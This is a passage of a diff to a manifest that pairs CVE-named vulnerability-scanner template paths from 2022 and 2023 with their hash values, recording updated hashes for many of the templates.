-http/cves/2022/CVE-2022-47966.yaml:3c3fff95441b9c262454fed854893705c6c81c6a -http/cves/2022/CVE-2022-47986.yaml:10039251a5256fba4e074f8ab929fff4d2698181 -http/cves/2022/CVE-2022-48012.yaml:a314bcd807127751eafd5704712ad817119d1e5d -http/cves/2022/CVE-2022-48165.yaml:2924708e53089f3448ccb9e4456eab50a255e475 -http/cves/2022/CVE-2022-48197.yaml:3637340a7a0a61a3a666170aa7c61cfba8420427 -http/cves/2022/CVE-2022-4897.yaml:69298dfcb359adcc00a49f5df06cd3ced0c5bd9f -http/cves/2023/CVE-2023-0099.yaml:9407e1c3bced15c82b969d23516fd90490c1aee1 -http/cves/2023/CVE-2023-0126.yaml:c9dec5f824c521f0333efd2134fce5831ff3b45b -http/cves/2023/CVE-2023-0159.yaml:623f9ab092c9590e7d9b3e245fe2f8b090df54f5 -http/cves/2023/CVE-2023-0236.yaml:380e957dae0bdeecfd2341e55c5dd820ce6d3e60 +http/cves/2022/CVE-2022-47615.yaml:bbe2e07ae5dbd832c2cc65b2f7ca36c030f52b33 +http/cves/2022/CVE-2022-47945.yaml:97169532b2b8b7571b95916c57424e72d7065998 +http/cves/2022/CVE-2022-47966.yaml:af1bb2fa2710b224c472e2a1b5af3838962c2728 +http/cves/2022/CVE-2022-47986.yaml:8ed22d99ee409641cd4ad6ac5f9c82611f723b00 +http/cves/2022/CVE-2022-48012.yaml:8ad3d951e84b4e917c805d17a978e04c6bd31cf8 +http/cves/2022/CVE-2022-48165.yaml:5b832f9fb849f7aadcb963a5c2fa8c87bf309497 +http/cves/2022/CVE-2022-48197.yaml:5698e9353865370a7b92e512b093b974453ff937 +http/cves/2022/CVE-2022-4897.yaml:53f0aba534dc50ab3f73fe45b077340a0f6f791b +http/cves/2023/CVE-2023-0099.yaml:e09f47a4940ff99c8bd70fe410b21e86584deaa7 +http/cves/2023/CVE-2023-0126.yaml:a54e76067a42d920676305e72882b5cb8d6db686 +http/cves/2023/CVE-2023-0159.yaml:06dfde67e7960bf7adf9597508141fdfac598393 +http/cves/2023/CVE-2023-0236.yaml:5fbf81b6152e933910d34f140cede20a70339f8c http/cves/2023/CVE-2023-0261.yaml:5087fa9d04efc600b41de02fcac82bda2bcf0595 -http/cves/2023/CVE-2023-0297.yaml:73ec3fd3ef519a4e10a5f0a6183e7fa44e032417 -http/cves/2023/CVE-2023-0334.yaml:20fe2a5a77dab3ff57b3fda74306c9653b1e1714 -http/cves/2023/CVE-2023-0448.yaml:eda3389c65a3febc26ecb5aab7b333cc7cd8752b -http/cves/2023/CVE-2023-0514.yaml:b190f731d39ae6bd7dd1fcc1614d4fc5ddd7a67a -http/cves/2023/CVE-2023-0527.yaml:449eebba4ffb759da9b3d3781d8265572e4872b9 -http/cves/2023/CVE-2023-0552.yaml:067807d345cdd332f78da62e988b12c17cda2ad2 -http/cves/2023/CVE-2023-0562.yaml:d7332a44f3d6f98ffc1b4b5975e4c09996456df8 +http/cves/2023/CVE-2023-0297.yaml:e7baf32f9942f688924d9a162dc7551de98dde89 +http/cves/2023/CVE-2023-0334.yaml:adafbaa999b2d81291647630f256534cf89e1964 +http/cves/2023/CVE-2023-0448.yaml:b1ef2c2f82671bf7768df19ac61414b49a800956 +http/cves/2023/CVE-2023-0514.yaml:cddeb96f132ed763163b122c5fd44456704ddf57 +http/cves/2023/CVE-2023-0527.yaml:0e9801c97087f3aa24b6257d56e6772b0e693c59 +http/cves/2023/CVE-2023-0552.yaml:0760deedf488e135c767704cd7e9ba47452832b5 +http/cves/2023/CVE-2023-0562.yaml:dedbac0108d92c16a716dfee990455027942e09f http/cves/2023/CVE-2023-0563.yaml:5826a789671414b74d945727d46e2868a0030eb9 -http/cves/2023/CVE-2023-0600.yaml:8ced611a1b904aa3fa713f0cf86b98333a9eee27 -http/cves/2023/CVE-2023-0602.yaml:963da93d44e1d420917e29807ab00d24da7f4a2a -http/cves/2023/CVE-2023-0630.yaml:76c40dee85cef62fea4bdbd5aac6615d56560379 -http/cves/2023/CVE-2023-0669.yaml:ee0e8d205aa9a8b41f3bbdb15c3080b58b78c1c5 -http/cves/2023/CVE-2023-0678.yaml:385c4eab403646be9bad42eb8a53d618f7c3b918 +http/cves/2023/CVE-2023-0600.yaml:09edb6a74e6c8b298542d990288279230e8755b8 +http/cves/2023/CVE-2023-0602.yaml:ff8508c23cf1205eacdf532b97243ed38c44192a +http/cves/2023/CVE-2023-0630.yaml:79c8dee6873225aaf9f80e29a2fe2ecd54b0cadc +http/cves/2023/CVE-2023-0669.yaml:6d285a26e93cfa32c6caa2c5836644273e50c8a6 +http/cves/2023/CVE-2023-0678.yaml:63b5b4ff9f86d447ef93ab3ef1459090de165b88 http/cves/2023/CVE-2023-0777.yaml:695dc3b34a41b2d46cabcb2c40a57b3fe284f036 -http/cves/2023/CVE-2023-0900.yaml:963be1ca8c5c3c2dabcf49c2f73a408a6c955c65 -http/cves/2023/CVE-2023-0942.yaml:79476071a557960f5884cdc592f8097574a6cf32 -http/cves/2023/CVE-2023-0947.yaml:da5f95caaa440787ccef2a601ba556668f24a959 -http/cves/2023/CVE-2023-0948.yaml:0e14d3c045afd9efb862ea0e614c73252ac4514c -http/cves/2023/CVE-2023-0968.yaml:f8e5b8ef259c139f4b482ba552268478f1da2cfb -http/cves/2023/CVE-2023-1020.yaml:b69666a2d79336b9770a923b39506a57d4b65265 -http/cves/2023/CVE-2023-1080.yaml:06a280b40e10d84f65e9d4fe0373160af43b23e5 -http/cves/2023/CVE-2023-1177.yaml:0597fd3928a78cb715bd3c5af3d98538afd0eb7e -http/cves/2023/CVE-2023-1263.yaml:18b8bfae0bd9aeea4569dc38e4580fb43fb0192a -http/cves/2023/CVE-2023-1362.yaml:807258298246ea1a9d3072d632645c1961eb6e92 -http/cves/2023/CVE-2023-1408.yaml:4ef772b4bbe713ec3b916a0cda682ea057272a1f +http/cves/2023/CVE-2023-0900.yaml:b759bab8d921f6f87047fe65b1a8270a25ac6c78 +http/cves/2023/CVE-2023-0942.yaml:727aa39921928b56f641bda22efa7bc0ceaa8b2a +http/cves/2023/CVE-2023-0947.yaml:99ec36b3fb58ac77cdb7da8e784120ca7d58bd3b +http/cves/2023/CVE-2023-0948.yaml:0367e3cf81b12e51330d0b1ab2d09761172a554d +http/cves/2023/CVE-2023-0968.yaml:ae1e19b9b10293fe400ba1410af6e61fe97fcb12 +http/cves/2023/CVE-2023-1020.yaml:5636fe07aa03fa9f3a0b33826c8f8f7a690f7925 +http/cves/2023/CVE-2023-1080.yaml:bcb835fba141a11986b02014068b75190537899c +http/cves/2023/CVE-2023-1177.yaml:f14c03311e38c1d9faebb9a86ee2723b3f417f87 +http/cves/2023/CVE-2023-1263.yaml:04b6a372edaa449d9f7d09dde92c7f53f70718e8 +http/cves/2023/CVE-2023-1362.yaml:cdee456e5b9cf88406cf478d4f9c519dc7ba89df +http/cves/2023/CVE-2023-1408.yaml:dc5282fda3dc97da2b9c2be50065535af09f6fc9 http/cves/2023/CVE-2023-1434.yaml:35cc7af9bfe87b4a88a973a22dae4cc94a23bd97 -http/cves/2023/CVE-2023-1454.yaml:43a3f533086bffd26a98f2d1fcf1904c34aca555 -http/cves/2023/CVE-2023-1496.yaml:9ccfb9de2723eeaf44995da93812f3c2b4a8befc -http/cves/2023/CVE-2023-1546.yaml:2a08741443b59c4a5fdbe02e4c0028b8c41a67e6 -http/cves/2023/CVE-2023-1671.yaml:73fd6161f1fcfe63a9a11493372a8ccef8c1d8cd -http/cves/2023/CVE-2023-1698.yaml:4ab257d35df1ae3ff59be5ff99a1fe141bd8da13 -http/cves/2023/CVE-2023-1719.yaml:683e6cc34d42a2d662085b33199a40b444736fb6 -http/cves/2023/CVE-2023-1730.yaml:918e7befadba4f7c4b12f0b3c959f704e9571f2b -http/cves/2023/CVE-2023-1780.yaml:34a036d95931c6b53e0cdbbe5524814efebac2c9 -http/cves/2023/CVE-2023-1835.yaml:0a952460cce5463c54ae68fca72f4c1bec74ec54 -http/cves/2023/CVE-2023-1880.yaml:254a4b78665d1b33b264997a8b496cb33fcc376e -http/cves/2023/CVE-2023-1890.yaml:36d627ec07a4728f8df5debe01f9dcefe52c90cf -http/cves/2023/CVE-2023-1892.yaml:cf100b4cee239124a45c620eabe4e227c72cd62b -http/cves/2023/CVE-2023-20073.yaml:2f3e6872656d3f4428b063cf071c2b2490a0d0dd -http/cves/2023/CVE-2023-2009.yaml:bb71de754a3ece32e5eca69ecd358e30f88f742b +http/cves/2023/CVE-2023-1454.yaml:f507915aeffd9373633f9903f3f42fd148ae631f +http/cves/2023/CVE-2023-1496.yaml:07cd1dcd0767b93ad10044260e11e4cbb12875ac +http/cves/2023/CVE-2023-1546.yaml:e1ce7e4455e8d70f81d039868cfa7c05e9b7950c +http/cves/2023/CVE-2023-1671.yaml:681f98443bbfc4892fc531bf522cf922ba80f813 +http/cves/2023/CVE-2023-1698.yaml:e945233b316cdedba4ca8e9d7b5fc33755f55d26 +http/cves/2023/CVE-2023-1719.yaml:7837cfc713541d4998a43dd94e445eedf1583e70 +http/cves/2023/CVE-2023-1730.yaml:0ac62ee0d8e280f74152e8189f92a7dcbd1a0d04 +http/cves/2023/CVE-2023-1780.yaml:a13c9a4883fbae14fc1fdfaffb1e1b0d942a6338 +http/cves/2023/CVE-2023-1835.yaml:10fd479ca3a5aa355acbca9f948ac5cfc84174b3 +http/cves/2023/CVE-2023-1880.yaml:6d83ee09fbe4910f81808b87ef627188221ff428 +http/cves/2023/CVE-2023-1890.yaml:8cbb29b8a367580d3c3df12f01b6f44096964487 +http/cves/2023/CVE-2023-1892.yaml:b427a93cbc382d7f03e99c1a52d0179c76b83cc2 +http/cves/2023/CVE-2023-20073.yaml:32602a37f6dedce15b6c14cfc174e3ab4a412b75 +http/cves/2023/CVE-2023-2009.yaml:0e458c2616c9e35744adb4e65737b8801f074695 http/cves/2023/CVE-2023-20198.yaml:a51d3f58209d7ee5a28087839f7bfe0ba70173c7 -http/cves/2023/CVE-2023-2023.yaml:521a587d1d6ebb7014e0800bf4f7a89a66e4bff5 -http/cves/2023/CVE-2023-2059.yaml:856fa67098cc6c0abe1bb0921e4dd4205bd017ee -http/cves/2023/CVE-2023-20864.yaml:39eebb5c215549237a86a0446e07210bc37b47d4 -http/cves/2023/CVE-2023-20887.yaml:ed50cf91b29dcdf6a78a4e524805ac4758ea41da -http/cves/2023/CVE-2023-20888.yaml:99b2bd7f57dedcd0a4fa003660be6817b734806f -http/cves/2023/CVE-2023-20889.yaml:08dffb50523b65314d66f11933aef18c2ae84066 -http/cves/2023/CVE-2023-2122.yaml:702367e6b6407a7d3ec8ddc7d1dc884bc622b8ad -http/cves/2023/CVE-2023-2130.yaml:3112dc19046f9cd9a37c8248f8dd4993a2785ea3 -http/cves/2023/CVE-2023-2178.yaml:1c0e5bdc28786bbf38e0dab3801f5ed0f7d57d80 -http/cves/2023/CVE-2023-22232.yaml:7a054b7c8eb7e2a0e5ea214bddba72a25b1812d6 -http/cves/2023/CVE-2023-2224.yaml:52adda04d740bd4bfdce198531080707a6914193 -http/cves/2023/CVE-2023-2227.yaml:54472ac0d1a72b07f2b8a497807a39cc85882372 -http/cves/2023/CVE-2023-22432.yaml:d50bb3793ea5aa8783f5fb80f2f8b341f44818b5 -http/cves/2023/CVE-2023-22463.yaml:211e5de7967e175e73daf8d08a733140f2488fed -http/cves/2023/CVE-2023-22478.yaml:a65b40c02a4506378bee485814f98c19b9ac1aa0 -http/cves/2023/CVE-2023-22480.yaml:5ec18234f5902740cd4c86a7f84a0e2d818b3238 -http/cves/2023/CVE-2023-22515.yaml:f94884e3194ae500480a750b04d0b5dbd958a72a -http/cves/2023/CVE-2023-22518.yaml:6238cdc95cb3717cfe137f219d12d6aa519a65cb -http/cves/2023/CVE-2023-2252.yaml:346166bd1121ed3848590e230197337add10baa3 -http/cves/2023/CVE-2023-22527.yaml:1d8437eb27cd2d5c3181f95a995500594155d36e -http/cves/2023/CVE-2023-22620.yaml:8684a2d7d57ec48828f6ef1531618c0ecb1da71f -http/cves/2023/CVE-2023-2272.yaml:9f036b4cefc719e329ca758c4e02905be7724bf2 -http/cves/2023/CVE-2023-22897.yaml:4389ebea96863e9755b765b82017e6d1bcdc4048 -http/cves/2023/CVE-2023-23161.yaml:4b0df851a5fccd63d08afa7aeff5ae4c8f0bd959 -http/cves/2023/CVE-2023-23333.yaml:ae5a7d1531b286d05d7daf5ae153686fef008f11 -http/cves/2023/CVE-2023-23488.yaml:e05ba2c9b2516c0cf2aca3095f8b0b3b17310941 -http/cves/2023/CVE-2023-23489.yaml:172b8a24c13a4a26a74102aa2a9422af872c837b -http/cves/2023/CVE-2023-23491.yaml:d4f0791828d94fe9af0974e9f408e12b276fecfd -http/cves/2023/CVE-2023-23492.yaml:e838305b5a0f367b3cc188f50edd708e12348e07 -http/cves/2023/CVE-2023-2356.yaml:56e18eafd05c1339a6cbdccc1a5e6937f7c4360c -http/cves/2023/CVE-2023-23752.yaml:125afb31775db2a9e83f2afe9e458a14fd110640 -http/cves/2023/CVE-2023-24044.yaml:ebaa1b4198d9540ac648e0a736095bf0468f5555 -http/cves/2023/CVE-2023-24243.yaml:bd6a21d166eeeaf0220de4b6f901b1eaaec3c935 -http/cves/2023/CVE-2023-24278.yaml:3f1219d513ec4b0aae780f1a9fbc67fece5b87a2 -http/cves/2023/CVE-2023-24322.yaml:c4b5cc0d4d70fa16682f706a954b95c84e0e7896 +http/cves/2023/CVE-2023-2023.yaml:6711a89e6918606b2dd7d47c76153e28261094b0 +http/cves/2023/CVE-2023-2059.yaml:d90234f615f76231d2e24221befc70aed4a1a8c9 +http/cves/2023/CVE-2023-20864.yaml:22050ddba9d20317baad72a08ded7974446dea6e +http/cves/2023/CVE-2023-20887.yaml:b1b143618d3396f595f72022fa53239a8b069a5e +http/cves/2023/CVE-2023-20888.yaml:efa8475387c2ab727684b086e65cb5d292a2a73a +http/cves/2023/CVE-2023-20889.yaml:16a60a2c49b7b52e149c9a108e3ed9d814607501 +http/cves/2023/CVE-2023-2122.yaml:46ca5a614d4044ae9ef00b08846d515fc92af1a6 +http/cves/2023/CVE-2023-2130.yaml:09284dfc7455d0803979c640213c48b540b0320a +http/cves/2023/CVE-2023-2178.yaml:9d030e9e9e685cff2820ffcda48385c1f1c3ed02 +http/cves/2023/CVE-2023-22232.yaml:405eae8487cd087f14eb89f375ee2ad4fdb39fef +http/cves/2023/CVE-2023-2224.yaml:ccf9b19f8648317b36a26d95da4e7ff5eaa2a076 +http/cves/2023/CVE-2023-2227.yaml:a543fd2374500619eabd60a33e9c3505301f3e9c +http/cves/2023/CVE-2023-22432.yaml:24909cb5a915d9380fa96d050b24d80d1a6f7348 +http/cves/2023/CVE-2023-22463.yaml:cc556e03212aad829d648982872bc5faf1736d6e +http/cves/2023/CVE-2023-22478.yaml:ef6e66eb6d47a4d69eaf216b2c1efd78ce62c36d +http/cves/2023/CVE-2023-22480.yaml:73ce7854345335bda42d333c7c0ff06814ff0aed +http/cves/2023/CVE-2023-22515.yaml:739c18a0ae5877afcec00abdb56fe6903cac125e +http/cves/2023/CVE-2023-22518.yaml:43089328e1ed1386683d74f8483b06a55767f8cd +http/cves/2023/CVE-2023-2252.yaml:6bdd5a55d3be400de7f3aa5b04a1e0cde7fc1d3e +http/cves/2023/CVE-2023-22527.yaml:c53d2a4bba640a999631b07b9cea85b371f4cb45 +http/cves/2023/CVE-2023-22620.yaml:b41d8e2aca1d8f11f7ef58bddaab7c900ef27175 +http/cves/2023/CVE-2023-2272.yaml:75fb822252ec07ce5f8c8234d5c99dbc214a5a8a +http/cves/2023/CVE-2023-22897.yaml:1dc50bc03e62695bf9930998ac50d1e8532031ca +http/cves/2023/CVE-2023-23161.yaml:330962071a2da439c6f4ad2cfd9399673b3c3748 +http/cves/2023/CVE-2023-23333.yaml:c82c96716e574b2ac6f5243a42561e6b661697d7 +http/cves/2023/CVE-2023-23488.yaml:cce2f22d82bdbb32512be4899c8956b8a98469b3 +http/cves/2023/CVE-2023-23489.yaml:e2f4be81d387be5eb2856fe6218282fee51428fb +http/cves/2023/CVE-2023-23491.yaml:7432abe66255565410e775aed3599fe72f64babf +http/cves/2023/CVE-2023-23492.yaml:9412ada1002d29956c069b2d1ed3fa39ebf9d4ca +http/cves/2023/CVE-2023-2356.yaml:afcfcb280eaa73e7841563176920159586de1c48 +http/cves/2023/CVE-2023-23752.yaml:855cd21aad48643be8adce80ee4a57b3cfaeb3e3 +http/cves/2023/CVE-2023-24044.yaml:b1fcbf242f8611b3d7429bbc30319b6a1cfded2e +http/cves/2023/CVE-2023-24243.yaml:5d77029d1e00451d81039ca3c90ea6df376e07b5 +http/cves/2023/CVE-2023-24278.yaml:1923ae74c574d89888f1c0724a3c6a58afe4d460 +http/cves/2023/CVE-2023-24322.yaml:08bc0c874464a6fc3abc02de139fe9083c41b221 http/cves/2023/CVE-2023-24367.yaml:dab63258fffca6b44d754ede551d56eea925a477 -http/cves/2023/CVE-2023-24488.yaml:8a381e70fd0643ed5d1371edb70b40e25e9b5ff8 -http/cves/2023/CVE-2023-24489.yaml:9db6384fde838fafdb4d669784540c03f03b427b -http/cves/2023/CVE-2023-24657.yaml:1efdbfecef2aacf600fb007989d4efc6aa9d7fbe -http/cves/2023/CVE-2023-24733.yaml:8c12c7187efcc4652bb7bf6bb0069cbe8762fc0d -http/cves/2023/CVE-2023-24735.yaml:35b457aeb699de6d59519aff249be662b70d4a37 -http/cves/2023/CVE-2023-24737.yaml:facc801d9eca13c7392c35caa520fb642f0c5971 -http/cves/2023/CVE-2023-2479.yaml:e380c2326f30db012e6a091a9a20bd2c9c56b0cd -http/cves/2023/CVE-2023-25135.yaml:8a3b6d23aac32527511e347c7212b8f8a227117b -http/cves/2023/CVE-2023-25157.yaml:a47b8df2e4f9871518e24d36431cc36466e35e36 -http/cves/2023/CVE-2023-25194.yaml:754c9c257413b4590237bd3a90e17393dace3436 -http/cves/2023/CVE-2023-25346.yaml:fca6cb7b61b9f36d5aaed4cc545a276e354c490d -http/cves/2023/CVE-2023-25573.yaml:c3d23d32db9e6ef1d891d06c6e28d48a684b1504 -http/cves/2023/CVE-2023-25717.yaml:0b6c0a8588e86f9213e2e17a2c043374955aba8c -http/cves/2023/CVE-2023-26035.yaml:0be0bf85dd852a1a7beed98f5fdc58ea4820e04c +http/cves/2023/CVE-2023-24488.yaml:d0fb3f9b0de2a277171ee4a98c8bd44aad7d2088 +http/cves/2023/CVE-2023-24489.yaml:88f26dd03607c7a69552055427bc8f70163d01c7 +http/cves/2023/CVE-2023-24657.yaml:748b677675913cd96bb56e2d9f537380735d2312 +http/cves/2023/CVE-2023-24733.yaml:c8b0d43ceccc3991aaa817097347478eafe24452 +http/cves/2023/CVE-2023-24735.yaml:798a0644a6f587cba391e0c4961fb65c23b5be7b +http/cves/2023/CVE-2023-24737.yaml:e908a841783481bb6076502ff80fe24f55cdc07d +http/cves/2023/CVE-2023-2479.yaml:a8d07e5b7b1f67b26ab9b7da395b407731963a68 +http/cves/2023/CVE-2023-25135.yaml:79052c6a9d0f339cf4678dd6f86dcc3d635123c2 +http/cves/2023/CVE-2023-25157.yaml:72d159aa24f1d5619484a3c71ef4dc55b3442d6a +http/cves/2023/CVE-2023-25194.yaml:ac4f9b068ead0939cb0c4594cd0cc167adde15ab +http/cves/2023/CVE-2023-25346.yaml:927dea62b1096bc9bbd1252b7ed33c0896cb5cc1 +http/cves/2023/CVE-2023-25573.yaml:88fd978e3618f24e47f91a04054eb7c4dfd0b6d8 +http/cves/2023/CVE-2023-25717.yaml:da602abf26a0f232d0b1dc69e47cbd6558d75fba +http/cves/2023/CVE-2023-26035.yaml:0bfdc98c4f6e89d83c4a57819408a9414c8878a2 http/cves/2023/CVE-2023-26067.yaml:a9b18f2101c4ada25295447e64d845c7fb5c4266 -http/cves/2023/CVE-2023-26255.yaml:72ba0cb106a848cbf4550abb5e379601fc8d57c7 -http/cves/2023/CVE-2023-26256.yaml:235515a1f0e49888d8e059097494109563de4d3f -http/cves/2023/CVE-2023-26347.yaml:e2a80f4ae72176cbd3d0b523754f551888e7bbda -http/cves/2023/CVE-2023-26360.yaml:8985b3d841f6b32d33228f02fb4a29cfd1c2f647 -http/cves/2023/CVE-2023-26469.yaml:fef5e0a0a6c5d3fb658813db3402193eb13a9711 +http/cves/2023/CVE-2023-26255.yaml:f0575f5af6b800ee96420011038c6e88d8553bb9 +http/cves/2023/CVE-2023-26256.yaml:4076934b1cf4dec9d2d68d5bc370d114d4f657ad +http/cves/2023/CVE-2023-26347.yaml:0388c53de52772e2015a0c467dccf94e6e568fa9 +http/cves/2023/CVE-2023-26360.yaml:fd2e3196bb84bd3bd861086b342978b9f7ac5e43 +http/cves/2023/CVE-2023-26469.yaml:73a3992126d3fdb82794695dd93297dc3f0312ff http/cves/2023/CVE-2023-2648.yaml:41ec7f7a05226cc4b5805c7b3018d5d492f21343 -http/cves/2023/CVE-2023-26842.yaml:a8e888fe71856500458f993a7623c95a5acf2d34 -http/cves/2023/CVE-2023-26843.yaml:a29e22aabb4f3c623854b0e2f79c6aaba42bd323 -http/cves/2023/CVE-2023-27008.yaml:99b72f80285fcea1ca809221940b6dd32a511432 -http/cves/2023/CVE-2023-27032.yaml:ff5f86063146df89d119061535c3d6cfa9c74474 -http/cves/2023/CVE-2023-27034.yaml:e2c1ce7882a10ef1b7e9126950304588d00ff267 -http/cves/2023/CVE-2023-27159.yaml:2687d77e90b419ac3a52ddc4e837eeb6135a6da6 -http/cves/2023/CVE-2023-27179.yaml:37e8c6b241909fc9025935c171317ee092f9b206 -http/cves/2023/CVE-2023-27292.yaml:e1e1459e70a9ca5c46dea4805292a28d3a3a19f3 -http/cves/2023/CVE-2023-2732.yaml:79fd7aa6bec37d483cfb379d64ec6c3e4cc9643e -http/cves/2023/CVE-2023-27350.yaml:67ce93d1dc0cae57f69ff987e8b286f20793092a -http/cves/2023/CVE-2023-27372.yaml:e833064281153ce8ac7a02f887ae3f68a226a81e -http/cves/2023/CVE-2023-27482.yaml:ea41159de1f086c65bf2457ced086d7f14253a0a -http/cves/2023/CVE-2023-27524.yaml:a88fb9d85f69836b3bcb45a35d3a0dbb1d04b62b -http/cves/2023/CVE-2023-27587.yaml:2b0120a91f748c89e4076fcb9da3bf146ac2fa48 -http/cves/2023/CVE-2023-27639.yaml:3abc73340d360a90f169d8020391b1bfa3648ac4 -http/cves/2023/CVE-2023-27640.yaml:2638f8d763d700bc5b7d44250d23c48acd14ea75 -http/cves/2023/CVE-2023-2766.yaml:a95114658ff96257f11b7dbefd91301f9c69d7cb -http/cves/2023/CVE-2023-2779.yaml:9d509e4687d753c62893603a17885a4513ec3d67 -http/cves/2023/CVE-2023-2780.yaml:20484e2a61e30cd318623f01f9cd9fbaedaff4ac -http/cves/2023/CVE-2023-27922.yaml:258b050c0bd24620658a6be06a2354a3af0b6037 -http/cves/2023/CVE-2023-2796.yaml:a25d85c244928e675267d06c4976d84d1a72d3d3 -http/cves/2023/CVE-2023-28121.yaml:49ee6dc575ca492684912f95dbcc8810f3f29de0 -http/cves/2023/CVE-2023-2813.yaml:485032b8c58efb4cdeb458a4387374d6faa9c4c5 -http/cves/2023/CVE-2023-2822.yaml:b638b609770d15a230fa7246f171a5a654bce03e -http/cves/2023/CVE-2023-2825.yaml:e52fcd86c715c973f0d368fec0a8bbe61a0aa3ac -http/cves/2023/CVE-2023-28343.yaml:c781cd98e3899efad10ad98e84ccad6bb0d2435c -http/cves/2023/CVE-2023-28432.yaml:257ea32d858fb24d05fd61158b2c57b3ce5766f1 -http/cves/2023/CVE-2023-28662.yaml:ad336c6a3427d0b47407455c18a117052d0bff5a -http/cves/2023/CVE-2023-28665.yaml:f7cbf06ff60743045c2b85276c87e28b0182c049 -http/cves/2023/CVE-2023-29084.yaml:c13b9fdcac929cdff02edcde7bd85a1b97fd8c31 -http/cves/2023/CVE-2023-29298.yaml:2dd762a56ce650feb87703cf13af9ad126d8103a -http/cves/2023/CVE-2023-29300.yaml:058aae0088baca6c4104fd3ed918e5c69b98c06f -http/cves/2023/CVE-2023-29357.yaml:f024b56091f0df09f899d7dce5127f26be7f53e0 -http/cves/2023/CVE-2023-29439.yaml:d4dcbb476711e37b1aefb260fada7f7c73bc587e -http/cves/2023/CVE-2023-2948.yaml:7ad9cd30952a0ea7e9166d7fb65ef1c220b258ef -http/cves/2023/CVE-2023-29489.yaml:47180817e6bc2c1554749248108d72d58a282932 -http/cves/2023/CVE-2023-2949.yaml:9fc7aee0d145a80fbd71cee3ff9e2267e33da980 -http/cves/2023/CVE-2023-29622.yaml:2fdca251f44d548618b82372fce1fc53007ad8d3 -http/cves/2023/CVE-2023-29623.yaml:190f636848087dae84be89aa535ffed1f5c02d97 -http/cves/2023/CVE-2023-2982.yaml:9cedb0411e86004cfa66c75629847a8267266235 -http/cves/2023/CVE-2023-29827.yaml:90f368b70e029388425d8a5ce9c20f8653d6b77b -http/cves/2023/CVE-2023-29887.yaml:e113d28b0ce375d0f46f3ca21f487a256def33f8 -http/cves/2023/CVE-2023-29919.yaml:b533c1f55fa3bb3f71c7236830fd870e9b1bd26e -http/cves/2023/CVE-2023-29922.yaml:7934ef556ed602ceda52383f485dab24bd6c53e5 -http/cves/2023/CVE-2023-29923.yaml:1af1cf8450a5c134bea04ba99ffdfc4fb1a35007 -http/cves/2023/CVE-2023-30013.yaml:4acc40ab863e771280c4a2342f99da6e83516ae6 -http/cves/2023/CVE-2023-30019.yaml:5f2d50fd372075aba087aec7a54079ffe951f85c -http/cves/2023/CVE-2023-30150.yaml:66829edcfb662a8c014d6d114af6c6efa3195958 -http/cves/2023/CVE-2023-30210.yaml:8d94b5c27055a849583fa596459504ed2186adcc -http/cves/2023/CVE-2023-30212.yaml:2b2fe5a177a8a63433016866132889649146b4f4 -http/cves/2023/CVE-2023-30256.yaml:c8ff7db1046cfba64af40cf83389cb0aecad9dd6 -http/cves/2023/CVE-2023-30258.yaml:778e4e61140adf7c5254116c77fc8a4ae90c59db -http/cves/2023/CVE-2023-30534.yaml:1e7e038bd6a2c2f5cba13e80bcd1a2ce1faea3c5 -http/cves/2023/CVE-2023-30625.yaml:07288271ea2118572d231f5b97192b928d4adc41 -http/cves/2023/CVE-2023-3077.yaml:d3b8b7a4a10118402a6d5118a60abf75a01c954c -http/cves/2023/CVE-2023-30777.yaml:84e1a81ce9f0ad56c8dc4249cab724697ea91a80 -http/cves/2023/CVE-2023-30868.yaml:0d890bae91b41fa1b84588722fb8d9e6aa45b3c8 -http/cves/2023/CVE-2023-30943.yaml:0d69bdceb77a742047c6c51eb8990082f537a68c -http/cves/2023/CVE-2023-31059.yaml:2f55ef6a46f15bb784839290fdc7a1a536472c36 -http/cves/2023/CVE-2023-31446.yaml:0ba3222752c4cc2de6941cdce24a66042f78e1c3 -http/cves/2023/CVE-2023-31465.yaml:6bd33dcdf6008201a427dc26394290cd8a743bee -http/cves/2023/CVE-2023-31548.yaml:2c5cbc65c0eccc342f8a64e1446f235eb72859a9 -http/cves/2023/CVE-2023-32077.yaml:209f5ecaac978f98f6002f5813e39d9f49226d5c +http/cves/2023/CVE-2023-26842.yaml:10cae8b4f3df387b1c4a37df6d7e2aedbf2d4f54 +http/cves/2023/CVE-2023-26843.yaml:13eedeb5f7c849016f32a2f45ba7f173c6b2bdc3 +http/cves/2023/CVE-2023-27008.yaml:09fcde0a313c113f34dafaa28c97666e0283d093 +http/cves/2023/CVE-2023-27032.yaml:d7be4494adad630ba076f9c07c53906d527fb723 +http/cves/2023/CVE-2023-27034.yaml:e97a62db332d16cad3a1cdb7830dfb87e1cef496 +http/cves/2023/CVE-2023-27159.yaml:c90e213d2262b9f193e525df1a7116d821023d2b +http/cves/2023/CVE-2023-27179.yaml:32e83ec871e822179dc7699285fafe32d4356cb8 +http/cves/2023/CVE-2023-27292.yaml:b52dc9ce1aeb127e2ab870ee5356d6ad0b000ca6 +http/cves/2023/CVE-2023-2732.yaml:378ae0f10a3912827d7c15919f8e1a6d0fe2f9ea +http/cves/2023/CVE-2023-27350.yaml:f0dd62057770227455d6cae2d5b30ac35286a438 +http/cves/2023/CVE-2023-27372.yaml:72c58a1d9c3f0ae3e29c7a6705aefea08672217a +http/cves/2023/CVE-2023-27482.yaml:a1f7bfaded3952990e267ace21564c1e7c30a343 +http/cves/2023/CVE-2023-27524.yaml:8b8310c667682faa2e5979cc13a81f073fea7fbd +http/cves/2023/CVE-2023-27587.yaml:60a08e795ba4fba51267211fb6b52965ea1186eb +http/cves/2023/CVE-2023-27639.yaml:ef6e0c1b295a1edd56cf92d1a064ae083f285a3f +http/cves/2023/CVE-2023-27640.yaml:8a848a7e9f380368c06dc6e6b9ad1a709d6bd6f0 +http/cves/2023/CVE-2023-2766.yaml:9ca36e1763589a1d8c809a724ee0cfd23ea295e0 +http/cves/2023/CVE-2023-2779.yaml:eafff3164c677d37a04194bcdc51b533692ee55e +http/cves/2023/CVE-2023-2780.yaml:f72133ca5cf8d976108d6d4b2f907e60cf0199ef +http/cves/2023/CVE-2023-27922.yaml:ba8517cad621418eadabe8601686d65428dd2b7d +http/cves/2023/CVE-2023-2796.yaml:4735c6740dd51b254556735690d36d69426bf740 +http/cves/2023/CVE-2023-28121.yaml:38b48c61d43bfa70415fa970ee25ed4f8ea05fc5 +http/cves/2023/CVE-2023-2813.yaml:14383aa3525cfbbc844f2caff67cda4f6dfc733b +http/cves/2023/CVE-2023-2822.yaml:760308ee5e17848b176d6465ab18679d582be37e +http/cves/2023/CVE-2023-2825.yaml:ae1cd203cc26527280ca32998f788de89e44d260 +http/cves/2023/CVE-2023-28343.yaml:1234c116ca3e732396624b0aac258298782693b1 